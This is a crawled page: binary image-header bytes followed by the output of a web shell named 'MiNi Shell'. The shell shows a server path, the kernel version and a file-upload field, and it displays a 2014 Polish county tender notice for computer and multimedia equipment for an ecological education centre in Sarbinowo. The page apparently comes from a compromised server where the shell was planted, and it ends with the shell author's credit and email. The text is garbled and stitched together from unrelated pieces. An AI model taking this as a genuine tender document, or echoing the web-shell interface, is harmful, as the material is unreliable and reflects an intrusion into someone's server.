JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140801/167129-N-2014.html

<p class="kh_header"><b>Koszalin: DOSTAWA  SPRZĘTU KOMPUTEROWEGO I  MULTIMEDIALNEGO ORAZ OPROGRAMOWANIA NA POTRZEBY CENTRUM  EDUKACJI  EKOLOGICZNEJ  W SARBINOWIE</b><br>
<b>Numer ogłoszenia: 167129 - 2014; data zamieszczenia: 01.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Koszaliński , ul. Racławicka 13, 75-620 Koszalin, woj. zachodniopomorskie, tel. 94 714 01 89, faks 94 714 02 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA  SPRZĘTU KOMPUTEROWEGO I  MULTIMEDIALNEGO ORAZ OPROGRAMOWANIA NA POTRZEBY CENTRUM  EDUKACJI  EKOLOGICZNEJ  W SARBINOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego i multimedialnego         oraz oprogramowania z usługami towarzyszącymi na potrzeby CENTRUM  EDUKACJI  EKOLOGICZNEJ w  Sarbinowie.
Przedmiot zamówienia  obejmuje:
- serwer - 1 sztuka  (L.p.  1 w załączniku nr 2 do SIWZ);
- szafa rack 24U z panelami dystrybucyjnymi i osprzętem - 1 sztuka  (L.p.  2  w załączniku nr 2 do SIWZ);
- listwa zasilająca - 2 sztuki (L.p.  3a  w załączniku nr 2 do SIWZ);
- listwa przepięciowa - 6 sztuk (L.p.  3b  w załączniku nr 2 do SIWZ);
- komputer All-In-One - 18 sztuk (L.p.  4  w załączniku nr 2 do SIWZ);
- komputer przenośny - 3 sztuki (L.p.  5  w załączniku nr 2 do SIWZ);
- komputer PC - 3 sztuki (L.p.  6  w załączniku nr 2 do SIWZ);
- drukarka monochromatyczna A4  - 3 sztuki (L.p.  7  w załączniku nr 2 do SIWZ);
- drukarka sieciowa wielofunkcyjna monochromatyczna A4 - 1 sztuka (L.p.  8  w załączniku nr 2 do SIWZ); 
- kolorowe urządzenie wielofunkcyjne A3 - 1 sztuka (L.p.  9  w załączniku nr 2 do SIWZ);
- projektor (typ 1) - 1 sztuka (L.p.  10  w załączniku nr 2 do SIWZ);
- projektor (typ 2) - 1 sztuka (L.p.  11  w załączniku nr 2 do SIWZ);
- projektor (typ 3) - 1 sztuka (L.p.  12  w załączniku nr 2 do SIWZ);
- zasilacz awaryjny UPS (typ 1) - 1 sztuka (L.p.  13  w załączniku nr 2 do SIWZ);
- zasilacz awaryjny UPS (typ 2) - 5 sztuk (L.p.  14  w załączniku nr 2 do SIWZ);
- zasilacz awaryjny UPS (typ 3) - 1 sztuka (L.p.  15  w załączniku nr 2 do SIWZ);
- system operacyjny klasy PC - 20 sztuk  (L.p.  16  w załączniku nr 2 do SIWZ);
- pakiet oprogramowania biurowego - 6 sztuk (L.p.  17  w załączniku nr 2 do SIWZ);
- przełącznik (typ 1) - 2 sztuki (L.p.  18  w załączniku nr 2 do SIWZ);
- przełącznik (typ 2) - 1 sztuka (L.p.  19  w załączniku nr 2 do SIWZ);
- system bezpieczeństwa - Firewall - 1 sztuka  (L.p.  20  w załączniku nr 2 do SIWZ);
- słuchawki z mikrofonem - 4 sztuki (L.p.  21  w załączniku nr 2 do SIWZ);
- konsola KVM - 1 sztuka (L.p.  22  w załączniku nr 2 do SIWZ);
- klimatyzator przenośny do serwerowni - 1 sztuka (L.p.  23  w załączniku nr 2 do SIWZ);
- dysk sieciowy NAS - 1 sztuka (L.p.  24  w załączniku nr 2 do SIWZ);
- głośniki - 4 kpl (L.p.  25  w załączniku nr 2 do SIWZ);
- mównica prelegenta - 1 sztuka (L.p.  26  w załączniku nr 2 do SIWZ);
- wzmacniacz wielokanałowy - 1 sztuka (L.p.  27  w załączniku nr 2 do SIWZ);
- głośniki sufitowe - 10 sztuk (L.p.  28 w załączniku nr 2 do SIWZ);
- wzmacniacz głośnikowy - 8 sztuk (L.p.  29  w załączniku nr 2 do SIWZ);
- mikrofon przewodowy zintegrowany z mównicą - 1 sztuka (L.p. 30 w załączniku nr 2 
  do SIWZ);
- mikrofon bezprzewodowy ze statywem - 1 sztuka (L.p.  31  w załączniku nr 2 do SIWZ);
- mikrofon bezprzewodowy - 1 sztuka (L.p.  32  w załączniku nr 2 do SIWZ);
- zestaw odbiorników i nadajników bezprzewodowych dla tłumacza - 1 kpl 
  (L.p.  33  w załączniku nr 2   do SIWZ);
- wizualizer - 1 sztuka (L.p.  34  w załączniku nr 2 do SIWZ);
- ekran projekcyjny sterowany elektrycznie - 1 sztuka (L.p.  35  w załączniku nr 2 do SIWZ);
- odtwarzacz Blue Ray - 1 sztuka (L.p.  36  w załączniku nr 2 do SIWZ);
- przełącznik HDMI 4 na 2 - 1 sztuka (L.p.  37  w załączniku nr 2 do SIWZ);
- konwerter VGA na HDMI - 1 sztuka (L.p.  38  w załączniku nr 2 do SIWZ);
- przełącznik HDMI 1 na 8 portów - 1 sztuka (L.p.  39  w załączniku nr 2 do SIWZ);
- konwerter Lan na HDMI - 1 sztuka (L.p.  40  w załączniku nr 2 do SIWZ);
- dotykowy wyświetlacz wielkoformatowy - 2 sztuki (L.p.  41  w załączniku nr 2 do SIWZ);
- monitor LCD 40 cali - 1 sztuka (L.p.  42  w załączniku nr 2 do SIWZ);
- aparat telefoniczny systemowy przewodowy - 4 sztuki (L.p. 43 w załączniku nr 2 do SIWZ);
- faks  na  papier  termiczny - 2 sztuki (L.p.  44  w załączniku nr 2 do SIWZ);
- monitor dotykowy 32 cale o dużej jasności 1000cd - 4 sztuki (L.p. 45 w załączniku nr 2 
  do SIWZ);
- wyświetlacz LCD 7680x1080 pikseli poziomy - 1 sztuka (L.p.  46  w załączniku nr 2 
  do SIWZ);
- jednostka sterująca do obsługi wyświetlacza 7680x1080 pikseli - 1 sztuka (L.p.  47
  w załączniku nr 2 do SIWZ);
- głośniki sufitowe - 24 sztuki (L.p.  48  w załączniku nr 2 do SIWZ);
- jednostka sterująca monitorem - 19 sztuk (L.p.  49  w załączniku nr 2 do SIWZ);
- monitor dotykowy 32 cale - 4 sztuki (L.p.  50  w załączniku nr 2 do SIWZ);
- monitor dotykowy 46 cali - 1 sztuka (L.p.  51  w załączniku nr 2 do SIWZ);
- obudowa suwnicowa monitora 46 cali - 1 sztuka (L.p.  52  w załączniku nr 2 do SIWZ);
- ściana do projekcji wideo - 1 sztuka (L.p.  53  w załączniku nr 2 do SIWZ);
- nagłośnienie sufitowe ze wzmacniaczem i źródłem dźwięku kierunkowego - 3 sztuki 
  (L.p.  54  w załączniku nr 2 do SIWZ);
- sygnalizator drogowy - 1 sztuka (L.p.  55  w załączniku nr 2 do SIWZ);
- sterownik odtwarzający pliki dźwiękowe standardu mp3 - 3 sztuki (L.p.  56  w załączniku  nr 2 do SIWZ);
- monitor full HD 1920x1080 pikseli, 65 cali w obudowie stojącej - 1 sztuka  
  (L.p.  57  w załączniku nr 2 do SIWZ);
- czujnik odległości z kamerą - 1 sztuka (L.p.  58  w załączniku nr 2 do SIWZ);
- ekspozytor w obudowie wykonanej w postaci stołu - 1 sztuka (L.p.  59  w załączniku nr 2 do SIWZ);
- zabudowany monitor dotykowy 55 cali full  HD 1920x1080 pikseli - 1 sztuka 
  (L.p.  60  w załączniku nr 2 do SIWZ);
- wyświetlacz wielkoformatowy - 1 sztuka (L.p.  61  w załączniku nr 2 do SIWZ);
- dotykowy monitor 46 cali - 2 sztuki (L.p.  62  w załączniku nr 2 do SIWZ);
- monitor dotykowy o przekątnej minimum 119 cm - 1 sztuka (L.p.  63  w załączniku 
  nr 2 do SIWZ);
- wózek do monitora dotykowego - 3 sztuki (L.p.  64  w załączniku nr 2 do SIWZ);
- wyświetlacz LCD 7680x1080 pikseli pionowy dotykowy - 1 sztuka (L.p.  65  w załączniku nr 2 do SIWZ);
- obudowa wyświetlacza LCD 7680x1080 pikseli pionowego - 1 sztuka 
  (L.p.  66  w załączniku   nr 2 do SIWZ);
- monochromatyczna kamera do rejestracji obrazu w podczerwieni - 1 sztuka 
  (L.p.  67  w załączniku   nr 2 do SIWZ);
- centrala telefoniczna montowana w obudowie rack - 1 sztuka
  (L.p.  68  w załączniku   nr 2 do SIWZ);
- zamek drzwiowy szyfrowy z klawiaturą - 1 sztuka   (L.p.  69  w załączniku   nr 2 do SIWZ);
- monitor LCD LED 23 cale - 4 sztuki (L.p.  70  w załączniku   nr 2 do SIWZ).
- oprogramowanie do obróbki grafiki  - 1 sztuka (L.p. 71  w załączniku   nr 2 do SIWZ);
- oprogramowanie antywirusowe - 30 sztuk (L.p. 72  w załączniku   nr 2 do SIWZ).

Przedmiot zamówienia obejmuje:
- dostawę sprzętu i oprogramowania określonego szczegółowo w załączniku nr 2 do SIWZ,
- transport,
- wniesienie,
- rozpakowanie,
- rozlokowanie we wskazanych pomieszczeniach;
- montaż i instalację,
- uruchomienie pod klucz;
- testy penetracyjne;
- wywóz zbędnych opakowań;
- serwis gwarancyjny;
- inne koszty (jeżeli wystąpią) niezbędne dla realizacji przedmiotu zamówienia.

SZCZEGÓŁOWY OPIS  PRZEDMIOTU  ZAMÓWIENIA  Z  MINIMALNYMI  WYMAGANIAMI ZAMAWIAJĄCEGO  odnośnie poszczególnych elementów dostawy   oraz  MINIMALNE GWARANCJE  i wymagania odnośnie serwisów gwarancyjnych zostały określone  w załączniku nr 2   do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6, 30.23.60.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY WYMAGA WNIESIENIA WADIUM  W  WYSOKOŚCI 15000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku  w tym zakresie.

W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć wraz z ofertą oświadczenie  o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na/wg załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował minimum  jedną dostawę o wartości  min. 500 000,00 PLN brutto obejmującą  sprzęt  komputerowy i/lub multimedialny  oraz oprogramowanie. 

Na potwierdzenie  spełniania postawionego warunku Wykonawca musi złożyć wykaz wykonanych głównych dostaw  sporządzony na/wg załącznika nr 6 do SIWZ.            Do wykazu należy załączyć dowód/dowody potwierdzający(e), że dostawa(y) została(y) wykonana(e) należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku w tym zakresie.

W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na/wg załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie określa szczegółowego warunku w tym zakresie.

W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na/wg załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia min. 500 000,00 PLN. 

Na potwierdzenie  spełniania postawionego warunku Wykonawca musi złożyć wraz z ofertą opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca posiada wymagane ubezpieczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W celu potwierdzenia spełnienia warunku udziału w postępowaniu odnośnie wiedzy i doświadczenia wykonawcy, w wykazie dostaw głównych należy wykazać minimum jedną dostawę obejmującą sprzęt komputerowy i/lub multimedialny oraz oprogramowanie o wartości min. 500 000,00 PLN brutto zrealizowaną w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.  
Na potwierdzenie  spełniania postawionego warunku Wykonawca musi złożyć wykaz wykonanych głównych dostaw  sporządzony na/wg załącznika nr 6 do SIWZ.            Do wykazu należy załączyć dowód/dowody potwierdzający(e), że dostawa(y) została(y) wykonana(e) należycie.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WYPEŁNIONY  FORMULARZ  OFERTOWY sporządzony na/wg  Załącznika  nr 1 do SIWZ; WADIUM (w przypadku wniesienia w formie innej niż pieniężna); PEŁNOMOCNICTWO (jeżeli występuje); ZOBOWIĄZANIEPODMIOTU/OSOBY udostępniającego(ej) Wykonawcy swoje zasoby (jeżeli występuje).
DOKUMENTY PODMIOTÓW  ZAGRANICZNYCH:
W świetle postawionych w niniejszym postępowaniu warunków udziału w postępowaniu, Wykonawcy mający siedzibę lub miejsce zamieszkania  poza terytorium Rzeczypospolitej Polskiej, składają oświadczenia i dokumenty takie jak Wykonawcy polscy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  dopuszcza następujące zmiany warunków umowy zawartej z Wykonawcą dotyczące w szczególności:
a)przedłużenie terminu wykonania umowy w przypadku wystąpienia przerw w wykonywaniu przedmiotu umowy z przyczyn zależnych od Zamawiającego,
b) zmiana podwykonawcy(ów) wskazanych w ofercie, jeżeli Wykonawca w trakcie wykonywania przedmiotu umowy dokona zmiany lub rezygnacji z podwykonawcy, na którego  zasoby Wykonawca powoływał się na zasadach określonych w art.26 ust.2b, w celu wykazania spełniania warunków udziału w postępowaniu, pod warunkiem, że wykaże Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego;
c) powierzenia podwykonawcy realizacji części zamówienia w sytuacji gdy Wykonawca  w ofercie zobowiązał  się samodzielnie  zrealizować całość zamówienia lub rezygnacji z podwykonawstwa i przejęcia przez Wykonawcę obowiązku wykonania całości przedmiotu zamówienia w sytuacji gdy Wykonawca zadeklarował w ofercie wykonanie przedmiotu zamówienia przy udziale podwykonawców.
Wszystkie powyższe postanowienia wymienione w pkt 1  stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania  do wyrażenia takiej zgody i nie rodzą żadnego roszczenia w stosunku do Zamawiającego. 
2.Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy 
(np. zmiana nr rachunku bankowego), b) zmiany danych teleadresowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> STAROSTWO  POWIATOWE  W  KOSZALINIE
75-620  KOSZALIN,  UL. RACŁAWICKA 13 POKÓJ 301/302 (III PIĘTRO).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2014 godzina 11:00, miejsce: STAROSTWO  POWIATOWE  W  KOSZALINIE
75-620  KOSZALIN,  UL. RACŁAWICKA 13 POKÓJ 301/302 (III PIĘTRO).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest  realizowany w ramach projektu   Rozbudowa Międzynarodowego Ośrodka Edukacji Ekologicznej w Sarbinowie, współfinansowanego ze środków Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Szczecinie oraz z Programu Operacyjnego Celu 3 Europejska Współpraca Terytorialna - Współpraca transgraniczna krajów Meklemburgia-Pomorze Przednie / Brandenburgia i Rzeczpospolita Polska (Województwo Zachodniopomorskie) 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com